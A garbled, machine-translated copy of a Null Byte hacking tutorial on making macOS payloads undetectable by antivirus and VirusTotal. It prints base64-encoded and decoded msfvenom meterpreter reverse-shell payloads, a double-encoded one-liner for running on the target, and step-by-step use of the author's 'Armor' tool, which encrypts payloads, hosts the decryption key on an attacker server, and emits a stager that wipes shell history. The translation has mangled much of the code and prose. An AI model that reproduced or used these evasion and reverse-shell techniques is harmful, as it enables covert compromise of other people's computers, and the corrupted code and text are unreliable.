قالب وردپرس درنا توس
Home / Tips and Tricks / How To Create An Undetectable Payload «Null Byte :: WonderHowTo

How To Create An Undetectable Payload «Null Byte :: WonderHowTo

Encrypting payload and coding stackers are more effective against macOS than you might think. In addition, it's very easy to avoid VirusTotal and macOS antivirus programs with a few simple tricks.

The objective of this project was to find a well-known and easily detectable MacOS payload and then find a method that enabled the same payload to perform on the MacBook's target. This would reliably confirm whether any discovered avoidance method was effective in implementing known payloads. In addition to testing malicious files against VirusTotal, they were tested in macOS Mojave (v10.14) against popular antivirus programs like Avast, AVG, BitDefender, Sophos and ClamXAV.

Readers should not confuse this topic by circumventing GateKeeper or System Integrity Protections (SIP). Performing an unsigned application and avoiding virus scanners are two different topics. The focus of this article will be to avoid detection of antivirus software and VirusTotal. As we will see below, in most cases, only encoding a payload is sufficient for antivirus detection.

Base64 Encoding Basics

Encoding, as an anti-virus development technique, is (generally) a very horrible idea that is easily decoded and identified. Encoding Python and Bash scripts, however, is common in projects such as Empire and Msfvenom. It allows the encoder to perform complex scripts without worrying about flying special characters that can cause a payload to break or fail.

Let's talk about base64 encoding one minute and see below the strings.

  echo & # 39; one & # 39; | base64
b25lCg ==

echo & # 39; one two & # 39; | base64
b25lIHR3bwo =

eko "and two three" | base64
IHR3byB0aHJ1ZQ0 = eko "and two three four" | base64 b251IHR3byB0aHJ1ZSBmb3VyCg == eko "and two three four five" | base64 All strings can be easily decoded ( -d in Kali, -D in macOS) using the command below.

  base64 -d <<< & # 39; b25lIHR3byB0aHJ1ZSBmb3VyIGZpdmUK 

Notice that the end of the strings changes subtly, while the beginning always begins to be the same. The same goes for most of the payloads. If only the IP address and port number are changed, the beginning of the produced base 64 coded payload will always be the same for each hacker and pentester with msfvenom. Below is an example created by msfvenom with the IP address "" [19659007] aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo = [19659008] The below msfvenom output use the same payload but with a different IP address "". [19659007] aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc + SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg == [19659008] No matter what IP and port is used, the first 142 characters are always identical when using this msfvenom payload. If it is not decoded and analyzed for fake code, it would at least seem reasonable that the antivirus program detects common bass64 strings - but they do not.

Simple Base64 coded payloads

Think or not find a malicious file like VirusTotal and antivirus customer detect was a challenge. After a bit of searching the internet for popular "hacking macOS" articles, a three-year Null Byte article from community member psytech140 offered a single usage fee msfvenom . By performing the command below, the following output produced.

  msfvenom -p python / meterpreter / reverse_tcp LHOST = LPORT = 4444

[-] No platform was selected by selecting Msf :: Module :: Platform :: Python from payload
[-] No arch selected, choose arc: python from payload
Load Length: 446 bytes
import base64, sewn, exec (base64.b64decode ({2: str, 3: lambda b: bytes (b, & # 39; UTF-8 & # 39;)} [sys.version_info[0]] (& # 39; # = & aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo 39;))) [19659008] This is a base64 encoded Python en-liner designed to interact with Metasploit. Save the single line to a file named "thisfileisevil.py" and upload it to VirusTotal resulted in a detection rate of 4/58. 

The detection frequency is surprisingly low. Decoding the embedded base64 string clearly disclose The Python script is designed to connect to a remote server ( on port 4444.

  base64 -d << < 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='

import socket,struct,time
for x in range(10):
l=struct.unpack('> I & # 39; s .recv )) [0]
d = s.recv (l)
while the lens (d) <l:
d + = s.recv (l-len (d))
exec (d, {s; s} s)) 

Save this decrypted Python code to a file named "thisfileisevil_without_encoding.py" and upload it to VirusTotal resulted in the following 1/56 detection rates.

Interestingly, the raw Python code got an even lower detection rate.

At this point, it is unclear exactly what VirusTotal and antivirus programs are trying to detect. They do not do a good job of decoding bass64 strings or flagging the 13 lines Python generated by msfvenom, which has undoubtedly been used thousands of times by various pioneers and hackers over the years.

Double Base64 Encoded Payloads

If a common coded payload is capable of avoiding most antivirus programs, double coding it should be an efficient technique too, right? Well, not really. Encoding the encrypted msfvenom output and upload to VirusTotal resulted in the following 1/54 detection.

Again detects 1/54 discovery by Microsoft, which does not help all macOS with antivirus software. This was achieved by first coding the msfvenom output - the same as the payload previously discovered.

  cat thisfileisevil.py | base64


It can be performed in the MacBook goal with the following command.

  python -c "$ (printf & # 39; & # 39; ENCODED-PAYLOAD-HERE & # 39; base64 -D)" 

Here printf and base64 use the MacBook to decode -D ) the string and immediately execute the command ( -c ) with Python - which again decodes the internal payload and creates a reverse TCP connection.

To my surprise, both VirusTotal and popular antivirus programs are avoided in this way. Not a tested antivirus software could detect a double-coded payload in the form of a text file or an AppleScript.

Encrypted payload

Until now, we have learned that encoding and double-coding payload will avoid detection of most antivirus programs (even if it is better using raw code). Nevertheless, coding scripts and payload a cat and mouse game between hackers and antivirus developers. It's just a matter of time before anyone at AVG or Avast discovers this Null Byte article and antivirus scanners start recursively decoding base64 strings and looking for common coded signatures.

This made me think of a more reliable method of defeating macOS antivirus; a solution that is a bit more difficult to detect and prevent. Encrypting the payload, in addition to encoding it, will provide a better solution to avoid antivirus scanners.

Why is encryption better than encoding?

The primary disadvantage of coding is the ability of the antivirus program to continuously decode base64 strings and easily detect the embedded payload. No matter how many times an attacker encodes his payload, it can be reversed. By encrypting the payload, the antivirus program will eventually find a series of unreadable data. The encrypted payload can not be scanned by AV software or read by people - not without knowing the decryption key.

What takes me to Armor, a simple shell script I created to illustrate how the encryption of macOS payload can be automated and executed.

How the "Armor" Script Works

Armor will encrypt the content in which file it is given. The file can contain a single-color file, a complex Python script with hundreds of code lines, or a post-exploitation script written in any programming language supported by macOS. The file content is encrypted with a one-time key. The key is then temporarily hosted on the attacker's server and loaded by the MacBook goal to decrypt the payload.

Below is an example of Armor used with a single Netcat payload.

There are some things happening in this GIF. I explain each step in order.

A Netcat listener is started at port 4444. The file "payload.txt" is read and displayed to contain a simple Bash liner that, when it's running, will create a TCP connection between the MacBook's target on the attacker's Netcat listener . Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker's server. When the stagger runs in target MacBook (not shown in GIF) decrypts and runs bash liner without writing any data to the hard drive. Ncat immediately terminates the listener after the key has been used. Once the Netcat connection is established, the attacker has remote access to the MacBook target.

For a technical explanation of what the script does and how it executes commands without writing data to the target hard drive, proceed to my GitHub page to see the comments. Readers interested in giving Armor a quick test run can follow the following steps.

Step 1: Install Armor

Armor can be found on my GitHub page and cloned with the command below.

  git clone https: //github.com/tokyoneon/Armor

Cloning in "Armor" ...
remote control: object listing: 7, done.
remote control: count objects: 100% (7/7), done.
Remote Control: Compress Objects: 100% (6/6), Made.
remote control: total 7 (delta 0), reuse 0 (delta 0), reuse 0
Unpacking of Objects: 100% (7/7), made. 

Change ( cd ) to the innovative Armor / Catalog.

  cd armor / 

script permission to perform.

  chmod + x armor.sh 

Step 2: Create payload

In my example GIF, a Bash liner uses to create a TCP connection, but let's simplify the attack by encrypting a trivial command [19659053] ls .

Use the command below to create the loadload.txt file.

  Echo & # 39; ls -la & # 39;> /tmp/payload.txt 

Step 3: Encrypt Load Load Load

Now encrypt loadload.txt content with Armor using the command below.

  ./armor.sh /tmp/payload.txt 443

.., co8oc.oo8888cc, ..
o8o. .., o889689ooo888o "88888888oooc ..
.8888 .88886888 ".88888888o & # 39; 888888888889ooo ....
a88P ..c688869 "" .., "o888888888o.?8888888888"".ooo8888oo.
088P ..atc8889 ", oo8o.86888888888o 88988889", o888888888888.
888t ... coo688889 "& # 39; Ooo88o88b. & # 39; 86988988889 8688888 & # 39; o8888896989 ^ 888o
888888888888 ".. ooo88896888888" 9o688888 "888988 8888868888 & # 39; o88888
"" G8889 "" "ooo88888888888888.d8o9889" "& # 39;" 8688o. "88888988" o888888o.
o8888 "" "" "" "" "" "o8688" 88868. 888888.68988888 "o8o.
88888o. "8888ooo." 8888. 88888.8898888o "888o ..
"8888l" "888888" "" "8o" 8888.8869888oo8888o
.;. . ;;;;;,. , & # 39; ,,.,;, & # 39; ;;;;;. :. "8888" 888888888 ^ 88o
OM0 xWl :: coK0. .WM ,; MW, KOlccxXd & # 39; Mk :: clkXc ..8888,. "88,888,888,888th
.WXM. xW K0 .WMK KMW Nk; M: & # 39; M: 1M & # 39 ;: o888.o8o. "866o9888o
LN.Xo xW OK .WKWc LWKW .Wd .Ml & # 39; M :; M: 888.8888. "88." 89 ".
0k dX xW OK .WodX. .NodW .Wd .Ml & # 39; M ;; M, 89 888888 "88":.
& # 39; M; & # 39; M, xW KO .Wo.No dX dW .Wd .Ml & # 39; M: oM. & # 39; 8888o
and Kx xW.cccoKO. .Wi cWlW: dW .Wd .Ml & Mc; Mc; cclkXc "8888 ..
Xd oN. xW xWc & # 39 ;. .Wo KM0 dW. Wd. M1 & M ;, WO & # 39 ;. 888888o.
; Mc ...: Mc xW 0K. .Wo, W & # 39; dW .Wd .Ml & # 39; M: cW: "888889,
OXlllllKK xW .KO .Wo & # 39; dW .Wd .Ml & # 39; M: oN & # 39 ;. ::. ::::. ::.
.Mo cM, xW .Xd .Wo dW .Wd .Ml & # 39; M: dX. created by @tokyoneon_
Ouch. .Wd xW & # 39; W: .Wo dW XO: M; & # 39; M: 0O
KO xN xW: N, .Wo dW .O0xodO0c & # 39; M: .Xk

[+] Generated Encryption Key: /root/Armor/payload.txt_5c6c.key
[+] Encrypted payload: /root/Armor/payload.txt_5c6c.enc
[+] Generated SSL Certificate: /root/Armor/payload.txt_5c6c.crt
[+] Generated SSL Key: /root/Armor/payload.txt_5c6c_ssl.key
[+] Saved Stager: /root/Armor/payload.txt_5c6c_stager.txt

[!] Execute in Case MacBook:

bash-c "$ (bash-c" $ (printf & # 39;% s & # 39; YjAxMjMyZTU2ZTFhNDAxMDFlY2FlNjlkPi9kZXYvbnVsbCAyPiYxOyBvcGVuc3NsIGVuYyAtZCAt
cHM6Ly8weDBBMkEwMDAxOjQ0Myk = & # 39; | base64-D) ")"; history -c

[!] Start the Ncat listener now? y / n

[!] Start Ncat listener: 

The address is the attacker's IP address where the decryption key will be hosted. This may be a local IP (for example, "") or a virtual private server address. The Ncat server uses this address and port number ( 443 ) to host the decryption key. Port 443 can be any free port in the attacker's Kali Linux system.

If LibreSSL (version of OpenSSL used by macOS) is not found in Kali, Armor will try to install it. Unfortunately, the version of OpenSSL contained in Kali / Debian is not compatible with MacOS & LibreSSL, unfortunately.

Step 4: Start Ncat Listener

Before driving, start the Ncat listener. Armor tries to start it automatically.

  [+] Ncat active for stager: payload.txt_e856 ...
Ncat: Version 7.70 (https://nmap.org/ncat)
Ncat: To listen ::: 443
Ncat: Listen to

Step 5: Perform Stager

Armor will produce an encrypted and encrypted command intended for the MacBook target. This stacker may be embedded in an AppleScript for USB drop attacks, used in USB Rubber Ducky attacks, or may be utilized in other social-tech attacks. For now, we'll just copy and paste the stakes into a MacBook terminal. [19659000] When the stakes are running, the MacBook terminal will list ( ls ) all ( -a )

We've Encrypted a single command ls but imagine the possibilities when applying the same degree of obfuscation to a sophisticated Python script designed to perform a series of advanced attacks. Antivirus software currently does not decode base64 strings - and even if they did, the embedded and encrypted payload could not be read.

Improve Attack

Armor is not perfect. It is a bit of proof of the concept that readers will hopefully find ways to improve. An alternative to LibreSSL, for example, because most Debian and Kali distros do not have it installed by default, it's a bit uncomfortable as an encryption solution.

Handling the decryption key on the attacker's server is dangerous. If the attacker's IP address is detected in stager, it may be possible to calculate the key's filename and download it. The key would enable the target to convert the encrypted payload and learn what type of exploitation performed on the MacBook.

The use of UDP on port 53 to send the decryption key would probably avoid detection of firewalls and deep-air inspection (DPI) - which makes it much more "undiscovered."

In addition, it is a way to encrypt payloads that are not dependent on the goal being connected to the Internet (to download the decryption key) Effectively.

Final Thoughts

After testing these attacks against VirusToal and at least six popular antivirus programs, no one could discover a double-coded payload. MacOS antivirus scanners almost do not seem to identify even the most common encodered payloads. Detecting something created by Armor will prove to be much more challenging for today's macOS antivirus scanners.

In addition, macOS explains too much on GateKeeper to prevent malware from being opened. As shown in an earlier article, GateKeeper protection is not applied to USB devices that are inserted into the MacBook, so the targets can be socially designed to open malicious files.

In order to proactively prevent such attacks, readers should check "How to Protect yourself from MacOS Attacks."

Do not Miss: How To Retrieve Mojave With A Self-Destructive Payload

Cover and Screen Shots of Tokyoneon / Null Byte

Source link